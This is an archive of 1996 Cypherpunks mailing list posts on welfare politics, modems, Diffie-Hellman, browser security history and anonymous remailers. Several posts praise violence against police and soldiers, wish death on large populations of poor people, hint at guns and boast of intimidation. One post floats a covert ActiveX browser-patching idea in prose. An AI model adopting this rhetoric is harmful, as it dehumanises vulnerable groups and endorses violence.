>        desperation caused by unemployment, the drastic reduc- 
>        tion of the buying power of salaries, the lack of at- 
>        tention to health, education and housing." 
>    Cordially, 
>    Jim 
>    NOTE. The AP newsstory's www.nando.net online filename: 
> 
>                       world2_15734.html 
>          I capitalized the Clinton-word in the last quota- 
>          tion. 
>          This critical essay was composed 09 15 96. 


>From what has appeared in the American media about this new Mexican rebel 
group, I'm particularly pleased with them.  This is exactly the kind of 
alternative that we need to the stereotypical, "kill lotsa innocent 
citizens" attacks which are often associated with the term terrorism.  They 
make it clear that they specifically target soldiers, police, and other 
government employees.

After reading a couple of articles, it is obvious what they need:  A method 
to prevent spoofing of their communiques, a function that PGP could do quite 
easily.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 16 Sep 1996 14:59:04 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <323C9BC1.2160@gte.net>
Message-ID: <Pine.3.89.9609152124.A20702-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 15 Sep 1996, Dale Thorn wrote:
> Just a comment: "The world population really should go back to around 
> one billion", etc. And how could we achieve that without severe govt. 
> oppression, one wonders? Now, I've heard of "education" being used to 
> help the masses learn to be responsible citizens ad nauseam, but since 
> education is pretty much just propaganda in the massively-capitalist 
> system now taking over even the P.R. of China, how the heck is education 
> going to work?

Quite simple. End all food and medical aid to developing countries paid 
for with money stolen at gunpoint from our citizens. Or make Norplant 
implants the condition for financial/in kind aid. Both US and 
abroad.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 16 Sep 1996 16:25:50 +0800
To: hallam@ai.mit.edu
Subject: Re: SPL -- Suspicious Persons List
Message-ID: <199609160558.WAA11070@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 9/15/96 -0400, Phill <hallam@ai.mit.edu> wrote:
>>     Work for the competition, or start your own company. 
>Easy enough for you or me who can charge the minimum wage rate
>for an hour for a period more like a minute.

In this part of California, most yard work is done by small companies
run by guys named Jose or Pablo, who can charge maybe 2-3x minimum
at most before the competition undercuts them.  And they have to
worry about blacklists also - "business licenses" and "immigration papers".

>...
>Being opposed to government slavery isn't enough. Coorporate slavery
>is just as bad. Unless people are enfranchised ecconmically as
>well as politically the political liberties don't matter much. 

It's not corporate slavery when you don't have to work for them.

>I am on an SPL that is run by an organisation called the "Ecconomic
>League". It is an organisation run by the UK Conservative party 
>which keeps lists of "unsafe" employees. Of course the list is 

(Just because I don't believe in the concept of "corporate slavery"
doesn't mean I don't think corporations can be offensive.  This sucks...)
Out of curiousity, I thought the UK had Data Privacy Laws or
some sort of Database Cops - does that not apply to applications like this?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 16 Sep 1996 16:47:34 +0800
To: craigw@dg.ce.com.au
Subject: Re: 56 kbps modems
In-Reply-To: <199609160033.KAA29614@mac.ce.com.au>
Message-ID: <Pine.3.89.9609152320.A26429-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 16 Sep 1996 craigw@dg.ce.com.au wrote:

> well here in Australia Telstra our national carrier only "garantees" 
> 2400 baud to work. I live within 2km of the exchange and the best I 
> have ever achieved was 22k/sec over the lines (usually about 18k). 
> This is not what the modem tells you it is doing....but what you get 
> as a result of testing the ACTUAL modem speed using a line analizer 
> program. What a modem manufacturer says you get and what the line 
> gives you are Totaly separate.

Seriously, how may of the 28.8 modem users get connections at 28.8? 
Twenty percent? Fifty percent? Today's modems are already faster than 
most analog lines can support. More likely than not, a 56k modem won't 
link up at 56k. If you want speed, use the clean solution. Get ISDN.

[And don't buy the Motorola BitSurfer PRO. It won't work with two line
phones. The sound is so bad, you can't use the POTS you pull out for
business.  Motorola: "We are aware of the problem". Well, they have been
aware of it since at least February.]

But for data, home ISDN is the way to go.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 16 Sep 1996 11:17:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61bb3e00021004ed98@[207.167.93.63]>
Message-ID: <199609152344.RAA15298@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


        before everyone else flames tim, I'll toss a couple-three
    Carter dollars in the pot:

        1.  where has compassion, which is wrung from an unwilling 
            minority by coercian, ever succeeded in building the 
            economy in *real* numbers without raising taxes 
            disproportionately for more bureaucratic waste?

            forget the idea that it will build a community --unless 
            you wish to consider the Bitch's "It Takes a Global 
            Village" a community.  Statist from the cradle; welcome
            to "Logan's Run."

        2.  if there is community "welfare" by the biblical definition,
            is it:

            a) socialism, and 

            b) does it cost the community additional taxes?  

            NO, it does not need to be or do either, BUT, it means
            that everybody independently attempts to succeed and the
            'community' takes care of itself --and in the standard 
            sense, the ne'er do wells fall off the path of *their own 
            free choice.*  There will always be sickness and calamity,
            but that is what the community is for.

            BTW, it still works today; I live in one of 'em.

        3.  deciding on a personal level where to draw the line is not
            necessarily socialy irresponsible. we will always have 
            Scrooge, and God-forbid we should lose a few bleeding-
            heart-with-your-money liberals for the final chestnut roast.

            Now, I don't intend to be Scrooge, but I'll fight for my
            rights to cut off at the knees the knee-jerk liberals and 
            government slavemeisters who want to tell me that I, and 
            2 others are required to support 100 freeloaders.  

            --a .357 mag shell can still be loaded for less than a 
            dime.

        NEXT?

            attila


In <ae61bb3e00021004ed98@[207.167.93.63]>, on 09/15/96 
   at 06:47 AM, tcmay@got.net (Timothy C. May) said:

= .I have no problem with letting them stay in agony (but you all knew
= .this).
= .
        that's what we all love about you, tim: your predictability.

= ."Saving for a rainy day," whether saving, investing, getting an
= .education (while others are out partying), preparing, etc., all
= .takes effort and commitment. If those who save and prepare are then
= .told they have to pay high taxes to support those who
= .partied....well, the predictable effect is that many of them will
= .say "I'll just party and let The System take care of me." Thus, the
= .effect of "not letting them stay in agony" is _more_ people in
= .agony. When you tell people that a compassionate society will meet
= .their basic needs, a predictable fraction of them will choose not
= .to work hard and prepare themselves.
=.
        fourth generation of the government dole in our ghettos, 
    or is it the fifth?

= .I say we need to let about 20 million Americans, and a couple of
= .billion in the rest of the world, meet their fate.

        you're figure is low.

= .While I will not _actively_ seek to dispose of them, I will work to
= .make sure they cannot continue to subsidize their lives at my
= .expense.

        no, they'll first try to cannibalize us, then fall upon 
    themselves and their demigod leaders.

= .Crypto Anarchy means getting rid of deadwood the old-fashioned way.

        NEXT!

= .--Tim May

= .We got computers, we're tapping phone lines, I know that that ain't
= .allowed.
= .---------:---------:---------:---------:---------:---------:---------:
= .Timothy C. May              | Crypto Anarchy: encryption, digital
= .money, tcmay@got.net  408-728-0152 | anonymous networks, digital
= .pseudonyms, zero W.A.S.T.E.: Corralitos, CA  | knowledge,
= .reputations, information markets, Higher Power: 2^1,257,787-1 |
= .black markets, collapse of governments. "National borders aren't
= .even speed bumps on the information superhighway."





--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Mon, 16 Sep 1996 16:45:46 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61f6ec05021004f2e5@[207.167.93.63]>
Message-ID: <v03007802ae62b4a59c67@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
>Tim May wrote:
>
>> The thing about _traditional_ charity, of the religious or community sort,
>> was that it was not treated as an "entitlement," as something the resentful
>> masses could "demand" as part of their "human rights."
>
>   There's no substantial difference between their resentful whining about
>their rights and your resentful whining about your rights - except maybe
>that you whine more.

Actually there is a fundemental difference:  what Tim demands is the
right to be left alone and to be free from exernal influence as long
as what he is doing does not directly hurt another, what "they" demand
is to be taken care of by others because they either cannot or choose not
to take care of themselves.  The latter requires that someone productive
(like Tim) be forced to take care of them through taxation or otherwise
at gunpoint.

In most societies this is considered the difference between a child and
an adult...

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 16 Sep 1996 12:05:06 +0800
To: cypherpunks@toad.com
Subject: Pipeline Up
Message-ID: <199609152351.XAA29294@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Cancel that poop about Pipeline being down. Seems only NYC is down. Access
is OK through PSInet. 
 
 
jyy@gnn.com is for top secret black SIGINT only, okay?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Justin Card <Wyntermute@worldnet.att.net>
Date: Tue, 17 Sep 1996 17:37:55 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie Hellman - logs in Galois fields
In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk>
Message-ID: <323CDB46.1632@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> 
> Hi all,
> 
> A question for the matematicians out there:
> 
> I am looking at the Diffie Hellman public key exchange protocol and
> am trying to find out why it is computationally hard to take logs in
> a finite (Galois) field.
> 
> My maths tutor has told me a bit about the construction of Galois
> fields (If I`m correct the construction is Z mod N, N some integer,
> then a transformation F(x) on the residue classes already in the
> field) I know also the definition is that there are P**k elements, p
> a prime.
> 
> My questions are as follows:
> 
> 1. How can a field be finite, as by definition it has to be closed
> under addition, subtraction, multiplication and division???? (sorry
> if this one is a bit of a no brainer, maybe the definition is
> different but I can`t seem to see how)

I'll have to let somebody else answer this one, since I am really not
sure.
 
> 2. Why is taking logs in a finite field computationally hard? - Me
> and Alec (My maths tutor at college) guessed that it is because
> exponentiation and logs are each others inverse functions, and
> somehow this becomes a one way function in a finite field.

As far as anybody knows, you're right, exponentiation is a one way
function in a prime field.  

However, there are some things to be said. If you're using a fixed g and
N, or repeat both for too many key exchanges, if anybody logged them, it
becomes a more exciting target, since the hard part of the algorithms
need be completed only once.  Then taking separate logs with the same g
and N is easy.
 
> 3. Are the Galois fields used in Diffie Hellman specially constructed
> in any way or are they just normal GF????

The field used in DH is just a standard Galois Field mod some large
prime. 

-- 
  Wyntermute




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 16 Sep 1996 00:13:59 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
Message-ID: <84279182110737@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>>[...]  The reason for the 40-bit key and (according to RSADSI, the
>>company that developed RC4) the reason why details on it were kept
>>secret was that these conditions were required under an agreement
>>between the Software Publishers Association (SPA) and the US
>>government which gave special export status to the RC4 algorithm and
>>a companion algorithm called RC2.
>
>Hadn't heard that before, that the trade secret requirement was imposed on
>RSADSI.  What was your source for that info, it is an interesting assertion on
>the part of RSADSI, and I am intrigued.
 
It's in AC II, p.319 (I was getting worried for a minute, I missed it the first
time I looked and then couldn't figure out where I'd got the info from).
 
>You ought to reference Andrew Roos paper [posted to the list, and sci.crypt,
>at least] analysing key schedule biases in RC4.
 
It's mentioned in the list of minor RC4 weaknesses.  I didn't include refs for
all of these because I've already probably got as many references in there as
text (the term "reference terrorism" has been used to describe some of my
papers in the past).
 
>Strangly (I'm not sure if anyone lost money due to this), I think Netscapes
>prices hardly suffered, perhaps even improved slightly. Could be due to the
>`any publicity is good publicity' syndrome.  There was a *lot* of publicity,
>and Netscapes response in fixing the problem was good.  Several US cypherpunks
>were tracking the stocks at the time, and could probably verify this.
 
Interesting... does anyone want to comment on this?  This kind of damages one
of my assumptions in the paper that publicity attacks can hurt a company
providing poor security.  Could it be that at the time people would buy
Netscape stock no matter what happened?  If MSIE had been widespread at the
time, would it have caused people to jump ship en masse?
 
>One omission: you didn't say anything about Paul Kocher's timing attack on
>RSA, which I think affected Netscape servers, and was fixed after his
>publicizing the attack.  Then you could discuss Ron Rivest's blinding
>solution, and the time delay solution.
 
It's a pretty obscure attack and one which most implementations (ones running
on home PC's) won't ever need to worry about, given that it's many times easier
to get a victim to download some whiz-bang ActiveX applet which quietly patches
their browser to use a fixed key for all SSL sessions.  Has anyone thought of
doing this?  If I had a system (and compiler) capable of building ActiveX
apps I'd love to do this - create an espionage-enabling screen saver or 
something.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 16 Sep 1996 21:20:07 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [Noise] Shopkeepers Preventing Riot Redistribution
In-Reply-To: <Pine.3.89.9609151539.A7811-0100000@netcom9>
Message-ID: <323D0FAA.330E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> On Sun, 15 Sep 1996, Jim Ray wrote:
> Indeed it was. In a beautiful-to-me scene which Miami's WSVN Channel 7
> (our big-hair station) called "chilling," Korean-American shopkeepers,
> perched atop their building with semi-automatic firearms, kept one
> block safe while the rest of the neighborhood burned without police 
> protection.
> Upon being informed that this was a biased interpretation of
> legitimate actions by the merchants, which _I_ found heartwarming,
> they said that chilling was "just a word."
> What your TV station probably didn't report was that the police
> quickly showed up at the scene. To arrest the looters carrying
> crowbars and torches? Of course not. The cops came to arrest the
> "sniper".  --Lucky

This fascinating aspect of law enforcement described above is something 
you can test for yourself:

Probably whatever state of the U.S. you (might) live in issues you a 
driver's license, to obtain which you read a booklet and pass a test. 
Get your booklet and read everything your state mandates about defensive 
driving, particularly in maintaining a minimum safe distance from other 
vehicles, given current velocities.

Now try to practice that safety on your state freeways. You will:

1. Be severly harrassed, threatened, and possibly injured or killed 
(more-or-less deliberately) by another driver who feels it's his/her 
right (incorrectly of course) to mount your car anally, rather than 
simply go around.

2. Be harrassed by the state police for "obstructing traffic" (even 
though the other driver initiated the problem, illegally), because after 
all, the state police are told (subliminally, I guess) not to protect 
you, but rather to keep traffic moving, which is "good for business".

3. Be charged as the party at fault when another driver runs into the 
back of your car, even when you are travelling in a straight line, 
within five MPH of the speed limit, and the freeway is practically 
empty.

Needless to say, such a charge is not hard to turn around if you're 
smart and know how to write stinging letters to the insurance company, 
if not the state govt. It's just interesting as hell to see the police 
follow a different book than their (presumed) bosses, the state govt. 

Common reason would suggest that the police would view a true defensive 
driver as a "troublemaker" (some sort of anarchist, perhaps?), and want 
to get that driver back into "normal" driving mode, or off the road 
completely.

I mention this because you can't normally test police attitudes with the 
gun-firing approach, but you can with a car. If my instincts prove 
correct, however, few people who read this post will see the reason in 
it, being in the majority of aggressive neurotic drivers (just a guess).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 16 Sep 1996 12:25:58 +0800
To: cypherpunks@toad.com
Subject: The Living and the Dead
Message-ID: <199609160154.BAA05664@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   For the vets unable to sleep: 
 
   The Washington Post has two heart-breaking pieces today 
   on a new book about Vietnam, "The Living and the Dead: 
   Robert McNamara and Five Lives," by Paul Hendrickson. 
 
   The book tracks the disaster being formulated in 1965 by 
   DC top-down policy interleaved with savagery to five 
   grunts in bloody battle. 
 
   There's a laudatory review of the grim book, and a long 
   magazine piece gives an excerpt which includes some of 
   Life's photos of a Marine copter gunner's transition from 
   happy-go-lucky, to butchery of buddies, to grief-stricken 
   collapse. It reawakens what's never forgot. 
 
   That April, 1965, Life photo-essay, "One Ride With Yankee 
   Papa 13," turned up in a sidewalk stall today so we'll 
   put 18 photos on our Web page for a glimpse back to the 
   future of power-mad policy begetting slaughter. 
 
   http://jya.com/yp01.jpg 
 
   through 
 
   http://jya.com/yp18.jpg 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 04:21:18 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <ae62ca2b020210047319@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 PM 9/16/96, jbugden@smtplink.alis.ca wrote:

>I don't think that a reasonable person would argue that medical insurance
>should
>be outlawed because everyone should take care of their own needs. A social
>safety net is simply a form of health and life insurance. Statistical arbitrage
>if you will. By spreading the risk you minimize the cost. Yes, some people will
>take advantage of the system. But like a virus, a robust system should be able
>to withstand this form of attack.

I have never argued against insurance! People who wish to buy insurance are
welcome to, obviously.

As to the "social safety net," things are far, far beyond a simple safety
net. When 14-year-old pregnant inner city girls are given money to set up
their own households (cf. Charles Murray's "Losing Ground"), this is not a
"safety net," this is subsidized breeding.

And so on.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 16 Sep 1996 16:13:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61f6ec05021004f2e5@[207.167.93.63]>
Message-ID: <199609160537.XAA22337@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <ae61f6ec05021004f2e5@[207.167.93.63]>, on 09/15/96 
   at 11:17 AM, tcmay@got.net (Timothy C. May) said:

= .At 11:43 PM 9/15/96, attila wrote:

= .>            NO, it does not need to be or do either, BUT, it means
= .>            that everybody independently attempts to succeed and
= .>            the 'community' takes care of itself --and in the
= .>            standardsense, the ne'er do wells fall off the path
= .>            of *their own free choice.*  There will always be
= .>            sickness and calamity, but that is what the community
= .>            is for.
= .>
= .>            BTW, it still works today; I live in one of 'em.

= .And lest there be any doubt, I _do_ support certain kinds of
= .charities, and will not of course stop anyone from practicing
= .charity. While I have no religious beliefs to speak of, 

        OK, Tim, we're patient...  we do not convert, we accept
    among the Saints only those who have received their own
    testimony.

        each must be free to pray as they believe.

= .I strongly
= .support the mechanisms some churches have for taking care of their
= .own members, recruits from the street, etc. 

        our members are our community. we believe in
    self-determination and that each must achieve is own greatness.
    we also believe in the support of the community, one and all. we
    do not file for government welfare.

= .(Including Salvation
= .Army and "mission" sorts of inner city things--note of course that
= .most such entities also insist on prayer and/or Bible readings as
= .part of the deal...

        well, we pray before our meals; we just ask that you respect
    our preference to pray.  we do not ask you to listen; if you
    listen, that is for your benefit; 

        The Salvation Army does make the men/women suffer through a
    short lesson and prayer.  maybe just one will listen one day;
    that is their reward.  The Salvation Army is just that: a
    dedicated army for the fallen.  Their "commanders" live in the
    same general quarters.

= .I wonder how long it will be before a class
= .action lawsuit is filed to stop the prayer part? This would
= .effectively shut the missions down, of course.)

        I doubt it would shut the Salvation Army down; that is a
    life long commitment and saving souls may be a mission, but not
    the raison d'etre of their existence.  

        The rest of them, I suspect the loss of 'mission' might be a
    death knell.

= .The thing about _traditional_ charity, of the religious or
= .community sort, was that it was not treated as an "entitlement," as
= .something the resentful masses could "demand" as part of their
= ."human rights." 

        THAT is the difference.  not until FDR was there an
    entitlement.
 
= .A parish priest, for example, might extend charity
= .to a poor person, or a widow, or whatever, but not to an
= .able-bodied person who simply decided to not work. 
= .
        that was the 'poor box' at the front of the sanctuary; the
    stories of the widow's mite (that and the teachings of Christ
    receiving the widow's mite).

= .Nor to an
= .unmarried woman who kept getting pregnant and having more mouths to
= .feed.

        well, stoning has not gone out of vogue in the muslim
    countries.
 
= .(I surmise that most such women either died of diseases related to
= .sexual promiscuity, died in childbirth, died of disease brought on
= .by malnutrition, or ended up in convents (Catholic birth control).)

        slave labour comes to mind...

= .The point is that even in an "age of charity," strings have to be
= .attached by the givers of charity. People will simply not give
= .40-60% of what they earn to support a growing population of people
= .who say it's their "right" to welfare, AFDC (Aid to Families with
= .Dependent Children), WIC (Women, Infants, and Children), food
= .stamps (*), and suchlike.
= .
        well, so far we are, by extortion, in what is labeled as the
    "worlds largest voluntary tax system"

        the problem is that the "entitlemented" are allowed to vote,
    and they outnumber us.  but heaven forbid that the liberal media
    should permit us to disenfranchise or decimate their cadres.

= .(At certain supermarkets I sometimes shop in on the way back to my
= .town, people in front of me in line put their nice cuts of meat
= .down, their fine loaves of bread, their frozen dinner entrees,
= .their "Ben and Jerry's Ice Cream," and then pay for it with books
= .of blue "Department of Agriculture" food stamps. 
=.
        I made a sarcastic comment some month's ago to a companion 
    as we viewed such a scene in a large supermarket (I sing bass or
    contrabass, and it carries).  

        the ensuing ruckus degenerated to a small group of the
    incensed illegals warily looking at the man in black, black
    assassins lid, mirrored aviators....  
        
        intimidation is just another form of communication...  

= .They use their own
= .cash (perhaps gotten by cashing their welfare and "disability"
= .checks) to buy their smokes and booze, as food stamps are not
= .allowed to be spent on this stuff. My impression is that they eat
= .more expensive food than I do, 

        they do, Tim, they do. --and more of it; the fruits of your
    labour!

= .perhaps because they're buying the
= .food with "play money," whereas I'm buying my food with money
= .that's what's left after I had to pay 40-50 taxes, so I seek to
= .economize when I can!)

        they can't add a checkbook or read to pass a driver's
    license, but they can count entitlement money.

        that's all right; after the Federal law killing the require-
    ment for alternative languages, you speak and write English
    to get a driver's license in Utah, or anything else. learn or 
    burn.

= .>            Now, I don't intend to be Scrooge, but I'll fight for
= .>            my rights to cut off at the knees the knee-jerk
= .>            liberals and government slavemeisters who want to tell
= .>            me that I, and 2 others are required to support 100
= .>            freeloaders.

= .And speaking of Scrooge, I like "A Christmas Carol" about as much
= .as anyone I know, and try to take the lesson of what Scrooge
= .learned as a general lesson about life and living it.

        In Dickensonian (I guess it works) England, the employer was
    ethically charged with the care of his employees. Of course,
    this all fits into my concept: 

            "in general, men are basically good 
                --unless it involves money."  

        Unfortunately, very few monied industrialists were
    charitable, and this fact gave FDR the opportunity to start the
    interminable dole, generation after generation of welfare
    _entitlements_.  

        the lazy, the pregnant teenagers on their third child, &c.
    believe they are _entitled_ to pick my pocket, and your pocket.

        at this point < 20% of the population is supporting > 80%
    who are _entitled_ to my support because some bleeding heart
    knee jerk says so.  the federal budget defines these programs as 
    _entitlements_ --they have even dropped the pretense of calling 
    it "aid" or "welfare."  It is a separate budget class by itself
    and does not figure in the stated deficit. and the slimeball 
    Clinton brought in for the Treasury, he already replaced the 
    entitlement funds with a government IOU...

        Scrooge needed to receive the revelation of charity --and to
    accept the principle.  He did.  Charity is not a Christian
    concept; it is fundamental human characteristic present to some
    extent in most humans, and differentiates us from say the ants,
    who cannibalize their fallen comrads.

        I know many good, charitable individuals who are not
    religious, even agnostics.  

        I've always discounted atheism as a conundrum; you can not
    deny before you first identify.

= .(As with "Robin Hood," the message is often confused. Robin Hood
= .was not "stealing from the rich," he was taking back what was
= .stolen from the peasants and farmers by the King and his tax
= .collectors, notably the Sheriff of Notingham. At least this is how
= .I read the myth.)

        you bet!  the Sheriff of Nottingham was _greedy_ and 
    merciless. Robin Hood was only returning the property to the 
    rightful owners  --a lesson missed by most.

        the real question: just how much of a myth is it?  the moral
    would not have been stated and the peasants would not have 
    protected the "merry band" had they been plunderers of the land.

= .--Tim May

        Oh, yes, I forgot to add a special message to "Dr. Dimitri" on
    his Piled higher [and] Deeper throne of cow feces, don't forget
    to address me as "Dr. Attila" 'cause I got a couple of them
    things, too.  

        and if Tim is an old fart, what am I?  I've got at least
    5-10 years on Tim.  --doesn't keep my hand off the cranked
    throttle of my 102 cu in outlaw chopper.

        --attila

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 16 Sep 1996 14:41:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Living and the Dead
Message-ID: <199609160408.EAA12805@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 16, 1996 01:54:40, 'jya@pipeline.com (John Young)' wrote: 
 
 
>18 Nam photos on our Web page for a glimpse back to the  
>future of power-mad policy begetting slaughter.   
 
 
Corrected URL's: 
 
 
http://pwp.usa.pipeline.com/~jya/yp01.jpg  
 
 
through  
 
 
http://pwp.usa.pipeline.com/~jya/yp18.jpg  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Mon, 16 Sep 1996 22:07:33 +0800
To: cypherpunks@toad.com
Subject: New type2.list/pubring.mix
Message-ID: <199609161103.GAA09054@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 16 Sep 1996 17:04:11 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609160537.HAA26159@basement.replay.com>
Message-ID: <199609160641.AAA23324@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <199609160537.HAA26159@basement.replay.com>, on 09/16/96 
   at 07:37 AM, nobody@replay.com (Anonymous) said:

= .Tim May wrote:

= .> The thing about _traditional_ charity, of the religious or community sort,
= .> was that it was not treated as an "entitlement," as something the resentful
= .> masses could "demand" as part of their "human rights."

= .   There's no substantial difference between their resentful whining about
= .their rights and your resentful whining about your rights - except maybe
= .that you whine more.

        that is worse than a cheap shot...  like a man low enough to 
    shoot another while he's taking a crap.

        I'm not whining about it my rights any more than Tim is 
    whining about his.  One of the principals of the American 
    Revolution was NO TAXATION WITHOUT REPRESENTATION. When our     
    government takes my money and creates a new class which "votes"
    to require me to pay for them; they are a vested interest voting
    only for their own gain without my consent.

        human rights are supposedly universal.  however, since when 
    has an entitlement been considered a "human right?"

        are you playing the part of the bleeding knee-jerk welfare 
    advocate?  The type: "I'm willing to give mine, (but I cheat on 
    my taxes) --just make sure you let the Feds extort their welfare 
    system from _your_ profits.

        The welfare system is not only broken and bankrupt, it is a 
    SELF EATING WATERMELON.

        charity is man's _benevolence_  and, there is nothing in the
    scriptures which says the lazy and resentful are _entitled_ to
    my support.  

        I tithe, and tithe faithfully; and contribute a fast offering 
    every month for the ward bishop's fund.  as in says in the 
    scriptures, he who faithfully tithes shall receive it tenfold.
    we take care of our own community, and we don't collect welfare.

        it works.

        and for the paid hypocritics who pass the basket every Sunday
    and scream about the poor --they dont give, they want you to give.

            --attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 17 Sep 1996 01:39:46 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199609161350.GAA29246@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
